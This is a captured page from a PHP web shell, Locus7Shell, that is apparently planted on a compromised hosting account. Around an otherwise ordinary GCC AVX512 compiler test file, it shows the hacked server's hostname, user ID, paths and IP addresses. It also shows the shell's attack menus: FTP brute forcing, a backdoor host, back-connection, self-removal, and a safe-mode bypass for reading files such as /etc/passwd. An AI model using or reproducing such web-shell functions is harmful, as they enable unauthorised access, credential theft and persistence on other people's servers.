Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.target/i386/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     cond_op_shift_d-2.c (1.76 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* { dg-do run } */
/* { dg-options "-O2 -mavx512vl -mprefer-vector-width=256" } */
/* { dg-require-effective-target avx512vl } */

#define AVX512VL
#ifndef CHECK
#define CHECK "avx512f-helper.h"
#endif

#include CHECK

#include "cond_op_shift_d-1.c"

#define BINO2C(OPNAME, OP)            \
  void                        \
  __attribute__ ((noipa,optimize ("O2")))    \
  foo_o2_##OPNAME##_const ()            \
  {                        \
    for (int i = 0; i != NUM; i++)        \
      if (b[i] < c[i])                \
    j[i] = d[i] OP 3;            \
      else                    \
    j[i] = MAX(d[i], e[i]);            \
  }

#define BINO2V(OPNAME, OP)            \
  void                        \
  __attribute__ ((noipa,optimize ("O2")))    \
  foo_o2_##OPNAME##_variable ()            \
  {                        \
    for (int i = 0; i != NUM; i++)        \
      if (b[i] < c[i])                \
    j[i] = d[i] OP e[i];            \
      else                    \
    j[i] = MAX(d[i], e[i]);            \
  }

BINO2C (shl, <<);
BINO2C (shr, >>);
BINO2V (shl, <<);
BINO2V (shr, >>);

static void
test_256 (void)
{
  int sign = -1;
  for (int i = 0; i != NUM; i++)
    {
      a[i] = 0;
      d[i] = i * 2;
      e[i] = (i * i * 3 - i * 9 + 6)%8;
      b[i] = i * 83;
      c[i] = b[i] + sign;
      sign *= -1;
      j[i] = 1;
    }
  foo_shl_const ();
  foo_o2_shl_const ();
  for (int i = 0; i != NUM; i++)
    {
      if (a[i] != j[i])
    abort ();
      a[i] = 0;
      b[i] = 1;
    }

  foo_shr_const ();
  foo_o2_shr_const ();
  for (int i = 0; i != NUM; i++)
    {
      if (a[i] != j[i])
      abort ();
      a[i] = 0;
      j[i] = 1;
    }

  foo_shl_variable ();
  foo_o2_shl_variable ();
  for (int i = 0; i != NUM; i++)
    {
      if (a[i] != j[i])
    abort ();
      a[i] = 0;
      b[i] = 1;
    }

  foo_shr_variable ();
  foo_o2_shr_variable ();
  for (int i = 0; i != NUM; i++)
    {
      if (a[i] != j[i])
      abort ();
      a[i] = 0;
      j[i] = 1;
    }
}

static void
test_128 ()
{
  
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.005 ]--